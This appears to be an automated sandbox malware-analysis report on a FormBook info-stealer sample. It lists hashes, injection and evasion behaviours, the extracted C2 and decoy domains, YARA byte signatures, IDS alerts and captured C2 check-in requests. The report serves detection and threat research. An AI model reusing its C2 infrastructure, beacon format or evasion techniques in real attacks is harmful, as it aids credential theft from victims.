Windows Analysis Report
7pECKdsaig.exe

Overview

General Information

Sample Name:7pECKdsaig.exe
Original Sample Name:3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a.exe
Analysis ID:830326
MD5:515bf958f062fec724fbe6bdadf39485
SHA1:50fbaeb36e98338dc500e252855abf0152bb6bbf
SHA256:3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a
Tags:exe, Formbook

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 7pECKdsaig.exe (PID: 6000 cmdline: C:\Users\user\Desktop\7pECKdsaig.exe MD5: 515BF958F062FEC724FBE6BDADF39485)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 5148 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 1328 cmdline: /c del "C:\Users\user\Desktop\7pECKdsaig.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.2348x.com/ar73/"], "decoy": ["classgorilla.com", "b6817.com", "1wwuwa.top", "dgslimited.africa", "deepwaterships.com", "hkshshoptw.shop", "hurricanevalleyatvjamboree.com", "ckpconsulting.com", "laojiangmath.com", "authenticityhacking.com", "family-doctor-53205.com", "investinstgeorgeut.com", "lithoearthsolution.africa", "quickhealcareltd.co.uk", "delightkgrillw.top", "freezeclosettoilet.com", "coo1star.com", "gemgamut.com", "enrichednetworksolutions.com", "betterbeeclean.com", "kbmstr.com", "colorusainc.com", "five-dollar-meals.com", "baozhuang8.com", "la-home-service.com", "innovantexclusive.com", "chateaudevillars.co.uk", "echadholisticbar.com", "naijacarprices.africa", "4652.voto", "kraftheonz.com", "ingrambaby.com", "braeunungsoel.ch", "sweetcariadgifts.co.uk", "kui693.com", "akatov-top.ru", "epollresearch.online", "cupandsaucybooks.com", "arredobagno.club", "gt.sale", "dskincare.com", "cursosemcasa.site", "leaf-spa.net", "deathbeforedeceit.com", "azvvs.com", "laptops-39165.com", "ccwt.vip", "011965.com", "mtevz.online", "jacksontcpassettlement.com", "aldeajerusalen.com", "kellnovaglobalfood.info", "alphametatek.online", "lcssthh.com", "dumelogold9ja.africa", "d-storic.com", "mogi.africa", "ghostt.net", "aksharsigns.online", "goglucofort.com", "b708.com", "controlplus.systems", "lightandstory.info", "invstcai.sbs"]}
Source | Rule | Description | Author | Strings
7pECKdsaig.exe | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    7pECKdsaig.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      7pECKdsaig.exe | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x5651:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1bfb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x14ca7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      7pECKdsaig.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14aa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14ba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14d1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x998a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1380c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa683:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ad17:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bd1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      7pECKdsaig.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x17c39:$sqlite3step: 68 34 1C 7B E1
      • 0x17d4c:$sqlite3step: 68 34 1C 7B E1
      • 0x17c68:$sqlite3text: 68 38 2A 90 C5
      • 0x17d8d:$sqlite3text: 68 38 2A 90 C5
      • 0x17c7b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17da3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17839:$sqlite3step: 68 34 1C 7B E1
          • 0x1794c:$sqlite3step: 68 34 1C 7B E1
          • 0x17868:$sqlite3text: 68 38 2A 90 C5
          • 0x1798d:$sqlite3text: 68 38 2A 90 C5
          • 0x1787b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
          Source | Rule | Description | Author | Strings
          0.2.7pECKdsaig.exe.a80000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
            0.2.7pECKdsaig.exe.a80000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
              0.2.7pECKdsaig.exe.a80000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
              • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              0.2.7pECKdsaig.exe.a80000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
              • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              0.2.7pECKdsaig.exe.a80000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
              • 0x17a39:$sqlite3step: 68 34 1C 7B E1
              • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
              • 0x17a68:$sqlite3text: 68 38 2A 90 C5
              • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
              • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
              No Sigma rule has matched
              Timestamp:03/20/23-09:12:27.000047
              Source IP:192.168.2.6
              Destination IP:34.102.136.180
              SID:2031453
              Source Port:49707
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/20/23-09:12:27.000047
              Source IP:192.168.2.6
              Destination IP:34.102.136.180
              SID:2031449
              Source Port:49707
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/20/23-09:12:27.000047
              Source IP:192.168.2.6
              Destination IP:34.102.136.180
              SID:2031412
              Source Port:49707
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              AV Detection

              Source: 7pECKdsaig.exe | ReversingLabs: Detection: 76%
              Source: 7pECKdsaig.exe | Virustotal: Detection: 59%
              Source: Yara match | File source: 7pECKdsaig.exe, type: SAMPLE
              Source: Yara match | File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: 7pECKdsaig.exe | Avira: detected
              Source: 7pECKdsaig.exe | Joe Sandbox ML: detected
              Source: 0.0.7pECKdsaig.exe.a80000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
              Source: 0.2.7pECKdsaig.exe.a80000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
              Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook
              Source: 7pECKdsaig.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 7pECKdsaig.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\7pECKdsaig.exe | Code function: 4x nop then pop ebx | 0_2_00A87B1A
              Source: C:\Users\user\Desktop\7pECKdsaig.exe | Code function: 4x nop then pop edi | 0_2_00A96CDD
              Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop ebx | 2_2_00587B1D
              Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop edi | 2_2_00596CDD

              Networking

              Source: C:\Windows\explorer.exe | Domain query: www.controlplus.systems
              Source: C:\Windows\explorer.exe | Domain query: www.mogi.africa
              Source: C:\Windows\explorer.exe | Domain query: www.kellnovaglobalfood.info
              Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
              Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
              Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
              Source: Malware configuration extractor | URLs: www.2348x.com/ar73/
              Source: global traffic | HTTP traffic detected:
                GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1
                Host: www.kellnovaglobalfood.info
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
              Source: global traffic | HTTP traffic detected:
                GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1
                Host: www.controlplus.systems
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
              Source: global traffic | HTTP traffic detected:
                HTTP/1.1 403 Forbidden
                Server: openresty
                Date: Mon, 20 Mar 2023 08:12:27 GMT
                Content-Type: text/html
                Content-Length: 291
                ETag: "64063330-123"
                Via: 1.1 google
                Connection: close
                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
              Source: global traffic | HTTP traffic detected:
                HTTP/1.1 403 Forbidden
                Server: openresty
                Date: Mon, 20 Mar 2023 08:12:47 GMT
                Content-Type: text/html
                Content-Length: 291
                ETag: "63fcb05a-123"
                Via: 1.1 google
                Connection: close
                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.controlplus.systems/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.controlplus.systemsReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.echadholisticbar.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.echadholisticbar.com/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.echadholisticbar.comReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hurricanevalleyatvjamboree.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hurricanevalleyatvjamboree.comReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ingrambaby.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ingrambaby.com/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ingrambaby.com/ar73/www.arredobagno.club
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ingrambaby.comReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovantexclusive.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovantexclusive.com/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovantexclusive.com/ar73/www.1wwuwa.top
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovantexclusive.comReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacksontcpassettlement.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacksontcpassettlement.com/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jacksontcpassettlement.comReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kellnovaglobalfood.info
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kellnovaglobalfood.info/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kellnovaglobalfood.infoReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mogi.africa
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mogi.africa/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mogi.africaReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtevz.online
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtevz.online/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtevz.online/ar73/r
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtevz.onlineReferer:
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quickhealcareltd.co.uk
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com
              Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quickhealcareltd.co.ukReferer:
              Source: unknown, DNS traffic detected: queries for: www.mogi.africa
              Source: C:\Windows\explorer.exe, Code function: 1_2_100D8F82 getaddrinfo,setsockopt,recv,1_2_100D8F82
